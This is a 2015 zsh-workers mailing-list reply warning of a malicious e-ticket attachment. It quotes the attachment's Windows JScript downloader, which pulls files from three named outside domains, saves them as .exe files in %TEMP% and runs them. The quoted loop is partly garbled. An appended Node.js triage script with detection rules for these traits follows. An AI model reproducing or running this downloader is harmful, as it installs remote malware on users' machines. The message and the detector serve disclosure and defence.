zsh-workers
From: Markus Trippelsdorf <markus@trippelsdorf.de>
To: Peter Stephenson <p.stephenson@samsung.com>
Cc: Zsh Hackers' List <zsh-workers@zsh.org>
Subject: Re: zsh-workers/37266 has a malicious attachment
Date: Tue, 1 Dec 2015 14:13:27 +0100
Message-ID: <20151201131327.GB315@x4>
In-Reply-To: <20151201122412.7d355172@pwslap01u.europe.root.pri>

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus
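
Added example, not part of the message above or of the attachment it quotes: a static triage check, runnable under Node.js, that flags a script combining the traits visible in the quoted code (HTTP client object, ADODB.Stream write of an ".exe" under %TEMP%, and WScript.Shell Run). The rule ids, the verdict names and both sample inputs are assumptions constructed for illustration.

```javascript
// Added example: static triage of a WSH/JScript mail attachment.
// Each rule matches one trait visible in the script quoted in the message.
const RULES = [
  { id: "wsh-shell",    re: /CreateObject\(\s*["']WScript\.Shell["']\s*\)/i },
  { id: "http-client",  re: /CreateObject\(\s*["']MSXML2\.XMLHTTP["']\s*\)/i },
  { id: "adodb-stream", re: /CreateObject\(\s*["']ADODB\.Stream["']\s*\)/i },
  { id: "temp-path",    re: /ExpandEnvironmentStrings\(\s*["']%TEMP%["']\s*\)/i },
  // A computed file name with a literal ".exe" appended, then written or run.
  { id: "write-exe",    re: /\.saveToFile\([^)]*["']\.exe["']/i },
  { id: "run-exe",      re: /\.Run\([^)]*["']\.exe["']/i },
];

// Returns the matched rule ids and a verdict. A single trait also occurs in
// ordinary admin scripts, so only fetch + write + execute together is
// reported as "dropper"; anything else that matches goes to manual review.
function triage(source) {
  const hits = RULES.filter((r) => r.re.test(source)).map((r) => r.id);
  const has = (id) => hits.includes(id);
  const fetches = has("http-client");
  const writes = has("adodb-stream") && has("write-exe");
  const runs = has("wsh-shell") && has("run-exe");
  let verdict = "clean";
  if (fetches && writes && runs) verdict = "dropper";
  else if (hits.length > 0) verdict = "review";
  return { verdict, hits };
}

// Constructed input 1: inert fragment built from lines of the quoted script
// (no host list and no request code, so it does nothing if executed).
const SAMPLE_ATTACHMENT = [
  'var ws = WScript.CreateObject("WScript.Shell");',
  'var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";',
  'var xo = WScript.CreateObject("MSXML2.XMLHTTP");',
  'var xa = WScript.CreateObject("ADODB.Stream");',
  'xa.saveToFile(fn + n + ".exe", 2);',
  'ws.Run(fn + n + ".exe", 1, 0);',
].join("\n");

// Constructed input 2: a harmless admin script that shares one trait.
const SAMPLE_ADMIN =
  'var sh = WScript.CreateObject("WScript.Shell"); sh.Popup("Backup finished");';

console.log(triage(SAMPLE_ATTACHMENT)); // all six rules match
console.log(triage(SAMPLE_ADMIN));      // one rule matches
```

The rules match literal strings only, so a script that assembles the ProgID or the extension from pieces will not trigger them; treat a "clean" result as "no known trait found", not as safe.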

